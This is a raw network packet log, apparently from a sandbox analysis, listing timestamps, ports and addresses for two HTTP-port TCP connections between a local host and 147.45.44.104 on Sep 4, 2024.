Sep 4, 2024 17:37:07.458054066 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.458070993 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.458100080 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.458173037 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.458184004 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.458216906 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.458270073 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.458281994 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.458292007 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.458306074 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.458308935 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.458317995 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.458332062 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.458339930 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.458363056 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.458399057 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.458576918 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.458587885 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.458599091 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.458615065 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.458620071 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.458626986 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.458647966 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.458648920 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.458659887 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.458669901 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.458671093 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.458683968 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.458700895 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.458708048 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.458714962 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.458733082 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.458738089 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.458753109 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.458769083 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.459341049 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.459359884 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.459372997 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.459384918 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.459389925 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.459397078 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.459408045 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.459414005 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.459418058 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.459429979 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.459434986 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.459439993 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.459443092 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.459456921 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.459470034 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.459480047 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.459481955 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.459492922 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.459501982 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.459506035 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.459517956 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.459523916 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.459530115 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.459541082 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.459543943 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.459580898 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.460294008 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.460314035 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.460325956 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.460335970 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.460340023 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.460349083 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.460349083 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.460361958 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.460370064 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.460380077 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.460391998 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.460391998 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.460400105 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.460403919 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.460417032 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.460417986 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.460427999 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.460438967 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.460444927 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.460449934 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.460460901 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.460470915 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.460474968 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.460489035 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.460500002 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.460505962 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.460515976 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.460517883 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.460529089 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.460540056 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.460560083 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.460587025 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.461230993 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.461241961 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.461253881 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.461263895 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.461275101 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.461276054 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.461282969 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.461286068 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.461298943 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.461311102 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.461318016 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.461321115 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.461333036 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.461333990 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.461344004 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.461354017 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.461363077 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.461365938 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.461379051 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.461399078 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.461399078 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.461416006 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.461936951 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.461949110 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.461958885 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.461970091 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.461981058 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.461982012 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.461992025 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.462003946 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.462013960 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.462014914 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.462028027 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.462039948 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.462044001 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.462060928 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.462064028 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.462078094 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.462085962 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.462090015 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.462106943 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.462107897 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.462121010 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.462131977 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.462132931 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.462143898 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.462156057 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.462162971 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.462172985 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.462177038 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.462199926 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.462218046 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.462769985 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.462781906 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.462791920 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.462804079 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.462814093 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.462817907 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.462826014 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.462833881 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.462837934 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.462851048 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.462858915 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.462873936 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.462902069 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.465265989 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.465312958 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.465315104 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.465358973 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.465398073 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.465440035 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.465442896 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.465456963 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.465478897 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.465500116 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.465576887 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.465588093 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.465596914 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.465607882 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.465615988 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.465629101 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.465662956 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.465853930 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.465866089 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.465876102 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.465887070 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.465897083 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.465898991 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.465908051 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.465919018 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.465926886 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.465930939 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.465941906 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.465943098 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.465955973 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.465979099 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.466003895 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.466326952 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.466337919 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.466348886 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.466377974 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.466391087 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.466497898 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.466542006 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.466558933 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.466576099 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.466608047 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.466619015 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.466662884 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.466674089 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.466684103 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.466695070 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.466706038 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.466708899 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.466717958 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.466747999 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.466948986 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.466959953 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.466969013 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.466979980 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.467001915 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.467003107 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.467025995 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.467027903 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.467041969 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.467050076 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.467066050 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.467083931 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.467084885 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.467097044 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.467118025 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.467120886 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.467144966 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.467152119 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.467168093 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.467183113 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.467242956 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.467253923 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.467263937 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.467293024 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.467293024 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.468815088 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.468826056 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.468836069 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.468872070 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.468899965 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.468947887 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.468959093 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.468990088 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.469002962 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.469013929 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.469026089 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.469038963 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.469073057 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.469264030 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.469276905 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.469288111 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.469300032 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.469311953 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.469347954 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.469350100 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.469362974 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.469372034 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.469383001 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.469383001 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.469396114 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.469410896 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.469412088 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.469419956 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.469427109 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.469439030 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.469440937 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.469455004 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.469482899 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.469547987 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.469559908 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.469573975 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.469585896 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.469594955 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.469597101 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.469619989 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.469634056 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.469672918 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.469707012 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.469727039 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.469738960 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.469748974 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.469760895 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.469772100 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.469773054 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.469798088 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.469964981 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.469980001 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.469997883 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.470005989 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.470011950 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.470024109 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.470031977 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.470035076 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.470048904 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.470058918 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.470061064 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.470074892 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.470076084 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.470087051 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.470098019 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.470099926 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.470139027 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.470149040 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.470537901 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.470547915 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.470558882 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.470577002 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.470583916 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.470591068 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.470602989 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.470609903 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.470613956 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.470624924 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.470632076 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.470638037 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.470649004 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.470654964 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.470659971 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.470670938 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.470670938 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.470683098 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.470699072 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.470702887 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.470710993 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.470711946 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.470722914 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.470735073 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.470735073 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.470745087 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.470757961 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.470761061 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.470769882 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.470781088 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.470789909 CEST	49719	80	192.168.2.6	147.45.44.104
